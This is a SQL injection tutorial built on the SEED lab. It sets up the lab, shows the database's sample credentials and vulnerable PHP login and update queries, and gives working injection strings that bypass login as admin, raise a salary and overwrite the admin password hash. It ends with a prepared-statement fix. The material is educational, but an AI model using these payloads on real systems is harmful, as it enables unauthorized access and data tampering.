select column_name from table_name

The update statement is used to modify data in a table.

update table_name set column2 = value2 where column1 = value1


In plain terms, what is SQL injection?

ailx10

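Outstanding answerer in network security

Master's degree in network security

It means that when a user enters input, they type SQL statements that change the intended command of the backend SQL statement.

SQL tutorial: www.w3school.com.cn/sql/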

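Preparing the lab environment

Install the SQL injection lab website in the SEED Ubuntu12 virtual machine:

$ tar -zxvf ./patch.tar.gz
$ cd patch
$ chmod a+x bootstrap.sh
$ ./bootstrap.sh

Disable PHP's SQL injection protection mechanism

In the /etc/php5/apache2/php.ini file,

change magic_quotes_gpc = On to Off.

Start the Apache service (sudo service apache2 start).

Configure DNS on another Linux host (add the following to the /etc/hosts file):

192.168.59.156 www.seedlabsqlinjection.com

OK! You can now access the site. Log in from the command line and view the database contents as follows: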

$ mysql -u root -pseedubuntu
mysql> use Users;
mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| credential      |
+-----------------+
mysql> select * from credential;
+----+-------+-------+--------+-------+----------+-------------+---------+-------+----------+------------------------------------------+
| ID | Name  | EID   | Salary | birth | SSN      | PhoneNumber | Address | Email | NickName | Password                                 |
+----+-------+-------+--------+-------+----------+-------------+---------+-------+----------+------------------------------------------+
|  1 | Alice | 10000 |  20000 | 9/20  | 10211002 |             |         |       |          | fdbe918bdae83000aa54747fc95fe0470fff4976 |
|  2 | Boby  | 20000 |  30000 | 4/20  | 10213352 |             |         |       |          | b78ed97677c161c1c82c142906674ad15242b2d4 |
|  3 | Ryan  | 30000 |  50000 | 4/10  | 98993524 |             |         |       |          | a3c50276cb120637cca669eb38fb9928b017e9ef |
|  4 | Samy  | 40000 |  90000 | 1/11  | 32193525 |             |         |       |          | 995b8b8c183f349b3cab0ae7fccd39133508d2af |
|  5 | Ted   | 50000 | 110000 | 11/3  | 32111111 |             |         |       |          | 99343bff28a7bb51cb6f22cb20a618701a2c2f58 |
|  6 | Admin | 99999 | 400000 | 3/5   | 43254314 |             |         |       |          | a5bdf35a1df4ea895905f6f6618e83951a6effc0 |
+----+-------+-------+--------+-------+----------+-------------+---------+-------+----------+------------------------------------------+

The site's original basic information is as follows:

User   Employee ID  Password   Salary  Birthday  SSN       Nickname  Email  Address  Phone#
Admin  99999        seedadmin  400000  3/5       43254314
Alice  10000        seedalice  20000   9/20      10211002
Boby   20000        seedboby   50000   4/20      10213352
Ryan   30000        seedryan   90000   4/10      32193525
Samy   40000        seedsamy   40000   1/11      32111111
Ted    50000        seedted    110000  11/3      24343244

1. SQL injection: how to escalate privileges and become admin directly?

Below is the code of the site's login module. Can you spot the vulnerability?

$conn = getDB();
$sql = "SELECT id, name, eid, salary, birth, ssn,
        phonenumber, address, email, nickname, Password
        FROM credential
        WHERE eid= '$input_eid' and password='$input_pwd'";
$result = $conn->query($sql);

// The following is pseudo code
if(name=='admin'){
    return All employees information.
} else if(name!=NULL){
    return employee information.
} else {
    authentication fails.
}

Vulnerability: "WHERE eid= '$input_eid' and password='$input_pwd'"

Attack string: ' or Name='admin';#

A successful login looks like this:

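2. SQL injection: how to modify salary and become rich overnight?

The site provides a page that lets users change their own nickname, email, address, phone number and password.

The code that updates personal information is written as follows. How could someone modify their own salary?

$conn = getDB();
$sql = "UPDATE credential SET nickname='$nickname',
        email='$email',
        address='$address',
        phonenumber='$phonenumber',
        Password='$pwd'
        WHERE id= '$input_id' ";
$conn->query($sql);

When we looked at the database from the command line, we saw the Salary column, didn't we?

Vulnerability: $sql = "UPDATE credential SET nickname='$nickname',...

Attack string: ',salary='9999999' where Name='Alice'#

Alice instantly becomes the richest person.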

3. SQL injection: how to change the password and lock admin out?

root@gt:/home# echo -n "seedadmin" | openssl sha1
(stdin)= a5bdf35a1df4ea895905f6f6618e83951a6effc0
root@gt:/home# echo -n "hackbiji.top" | openssl sha1
(stdin)= a504e9efce2d451b08c285b2dfd2e7f8b241ba03
root@gt:/home#

Attack string: ',Password='a504e9efce2d451b08c285b2dfd2e7f8b241ba03' where Name='Admin'#

Now Admin can no longer log in to their own account. Poor webmaster.
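The login query from section 1 and the profile update from sections 2 and 3, rewritten with prepared statements; this is an added example, not code from the original article or from the SEED lab. Assumptions: PDO with an in-memory SQLite database stands in for the lab's MySQL and getDB(), the table has a reduced column set, and the helper names login, updateNickname and salaryOf are hypothetical.

```php
<?php
// Added example. In-memory SQLite via PDO stands in for the lab's MySQL (assumption).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE credential (id INTEGER PRIMARY KEY, name TEXT, eid TEXT,
           salary INTEGER, nickname TEXT, password TEXT)");

// Constructed sample rows: two users from the article's table, reduced column set.
$ins = $db->prepare("INSERT INTO credential (name, eid, salary, nickname, password)
                     VALUES (?, ?, ?, '', ?)");
$ins->execute(['Alice', '10000', 20000, sha1('seedalice')]);
$ins->execute(['Admin', '99999', 400000, sha1('seedadmin')]);

// Hypothetical helper: login with placeholders, so input never becomes SQL text.
function login(PDO $db, string $eid, string $pwd): ?array {
    $stmt = $db->prepare("SELECT id, name, eid, salary FROM credential
                          WHERE eid = ? AND password = ?");
    $stmt->execute([$eid, sha1($pwd)]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hypothetical helper: the statement names the only column that may change,
// and the row id comes from the server-side session, not from the form.
function updateNickname(PDO $db, int $sessionUserId, string $nickname): void {
    $stmt = $db->prepare("UPDATE credential SET nickname = ? WHERE id = ?");
    $stmt->execute([$nickname, $sessionUserId]);
}

// Hypothetical helper used to inspect the result of the update.
function salaryOf(PDO $db, string $name): int {
    $stmt = $db->prepare("SELECT salary FROM credential WHERE name = ?");
    $stmt->execute([$name]);
    return (int) $stmt->fetchColumn();
}

// The strings from sections 1 and 2 are bound as values, not parsed as SQL.
var_dump(login($db, "' or Name='admin';#", ''));      // compared as an EID literal
var_dump(login($db, '10000', 'seedalice')['name']);   // legitimate login still works

updateNickname($db, 1, "',salary='9999999' where Name='Alice'#");
var_dump(salaryOf($db, 'Alice'));                     // salary column is never touched
```

Run with the PHP CLI with pdo_sqlite enabled: the injected login matches no row and Alice's salary is unchanged, because the database receives the query structure and the user input separately.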